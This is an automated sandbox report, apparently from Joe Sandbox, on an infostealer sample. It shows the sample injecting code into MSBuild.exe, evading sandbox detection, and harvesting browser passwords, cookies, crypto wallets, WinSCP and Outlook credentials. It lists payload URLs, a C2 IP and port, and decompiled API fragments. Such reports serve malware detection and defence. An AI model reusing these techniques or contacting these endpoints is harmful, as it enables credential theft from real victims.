                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBC038 LdrInitializeThunk,3_2_00EBC038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Ycj3d5NMhc.exe, ThemeManager.csReference to suspicious API methods: Application.Current.TryFindResource((object)new ComponentResourceKey(typeof(NavigationPane), (object)"ActiveTheme"))
                  Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, ParentProcessUtil.csReference to suspicious API methods: NativeMethods.OpenProcess(PROCESS_QUERY_INFORMATION, bInheritHandle: false, (uint)id)
                  Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: KernelLoadLibrary64(GeckoResourcePath + "nss3.dll")
                  Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(NSS3, "NSS_Init")
                  Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "VirtualProtectEx")
                  Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "WriteProcessMemory")
                  Source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, HeavensGateProcessor.csReference to suspicious API methods: NativeMethods.ReadProcessMemory(lpTargetHandle, (uint)processParameters, intPtr, (uint)Marshal.SizeOf(typeof(ulong)), ref lpNumberOfBytesRead)
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000Jump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000Jump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 983008Jump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUIDJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeQueries volume information: C:\Users\user\Desktop\Ycj3d5NMhc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC_config_file
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash_config_file
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyAaiaifbiceejhhkfbjdgonjgljkpcdhch
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC_config_file
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus_directory
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum_directory
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Ycj3d5NMhc.exe PID: 2884, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5992, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  311
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  111
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  Credentials in Registry
                  1
                  Process Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                  Virtualization/Sandbox Evasion
                  Security Account Manager41
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares2
                  Data from Local System
                  2
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information
                  LSA Secrets1
                  System Network Configuration Discovery
                  SSHKeylogging13
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing
                  Cached Domain Credentials133
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483417 Sample: Ycj3d5NMhc.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 96 26 ipinfo.io 2->26 28 investdirectinsurance.com 2->28 30 3 other IPs or domains 2->30 38 Multi AV Scanner detection for submitted file 2->38 40 .NET source code contains potential unpacker 2->40 42 .NET source code references suspicious native API functions 2->42 44 2 other signatures 2->44 9 Ycj3d5NMhc.exe 15 2->9         started        signatures3 process4 dnsIp5 32 investdirectinsurance.com 104.21.65.79, 443, 49707, 49708 CLOUDFLARENETUS United States 9->32 24 C:\Users\user\AppData\...\Ycj3d5NMhc.exe.log, CSV 9->24 dropped 46 Found many strings related to Crypto-Wallets (likely being stolen) 9->46 48 Writes to foreign memory regions 9->48 50 Allocates memory in foreign processes 9->50 52 Injects a PE file into a foreign processes 9->52 14 MSBuild.exe 15 6 9->14         started        file6 signatures7 process8 dnsIp9 34 ipinfo.io 34.117.59.81, 443, 49709 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 14->34 36 79.110.49.176, 2233, 49710 OTAVANET-ASCZ Germany 14->36 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->54 56 Tries to steal Mail credentials (via file / registry access) 14->56 58 Tries to harvest and steal browser information (history, passwords, etc) 14->58 60 Switches to a custom stack to bypass stack traces 14->60 18 WMIC.exe 1 14->18         started        20 conhost.exe 14->20         started        signatures10 process11 process12 22 conhost.exe 18->22         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Ycj3d5NMhc.exe24%ReversingLabsWin32.Dropper.Generic
                  Ycj3d5NMhc.exe9%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  bg.microsoft.map.fastly.net0%VirustotalBrowse
                  ipinfo.io0%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd40%Avira URL Cloudsafe
                  https://ipinfo.io/missingauth0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bd0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdP0%Avira URL Cloudsafe
                  https://ipinfo.io/missingauth0%VirustotalBrowse
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdj0%Avira URL Cloudsafe
                  https://ipinfo.io/json0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bd1%VirustotalBrowse
                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/0%Avira URL Cloudsafe
                  https://discord.com/api/v9/users/0%VirustotalBrowse
                  https://ipinfo.io0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/m0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd1%VirustotalBrowse
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                  https://investdirectinsurance.com/1%VirustotalBrowse
                  https://ipinfo.io0%VirustotalBrowse
                  https://ipinfo.io/json0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.214.172
                  truefalseunknown
                  ipinfo.io
                  34.117.59.81
                  truetrueunknown
                  investdirectinsurance.com
                  104.21.65.79
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bdfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ipinfo.io/jsontrue
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ipinfo.io/missingauthMSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002986000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd4Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdPYcj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdjYcj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://discord.com/api/v9/users/Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://investdirectinsurance.com/Ycj3d5NMhc.exe, 00000000.00000002.1487067677.00000000008A7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ecosia.org/newtab/MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ipinfo.ioMSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/mYcj3d5NMhc.exe, 00000000.00000002.1490876841.000000001B618000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    79.110.49.176
                    unknownGermany
                    57287OTAVANET-ASCZfalse
                    34.117.59.81
                    ipinfo.ioUnited States
                    139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                    104.21.65.79
                    investdirectinsurance.comUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483417
                    Start date and time:2024-07-27 11:36:13 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 49s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Ycj3d5NMhc.exe
                    renamed because original name is a hash value
                    Original Sample Name:c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269.exe
                    Detection:MAL
                    Classification:mal96.spyw.evad.winEXE@7/5@2/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 188
                    • Number of non-executed functions: 12
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 13.85.23.86, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.242.39.171
                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    05:37:21API Interceptor20x Sleep call for process: MSBuild.exe modified
                    05:37:22API Interceptor1x Sleep call for process: WMIC.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    79.110.49.176pandora.mpslGet hashmaliciousMiraiBrowse
                      34.117.59.81mek_n_bat.batGet hashmaliciousUnknownBrowse
                      • ipinfo.io/json
                      QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/json
                      z30PO1028930.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                      • ipinfo.io/ip
                      SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      IP-Grabber.ps1Get hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      BadUsb.ps1Get hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      ZmYfQBiw.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/
                      jmdCh1Z3.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/
                      wAFWKlU1.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/
                      104.21.65.79SWIFT.exeGet hashmaliciousLokibotBrowse
                        SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ipinfo.ioengine.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          invoker.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          tgmes.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          x.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          invoker.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          locker.ps1Get hashmaliciousTrojanRansomBrowse
                          • 34.117.59.81
                          mek_n_bat.batGet hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          zx.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          file.exeGet hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          fp2e7a.wpc.phicdn.netQUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 192.229.221.95
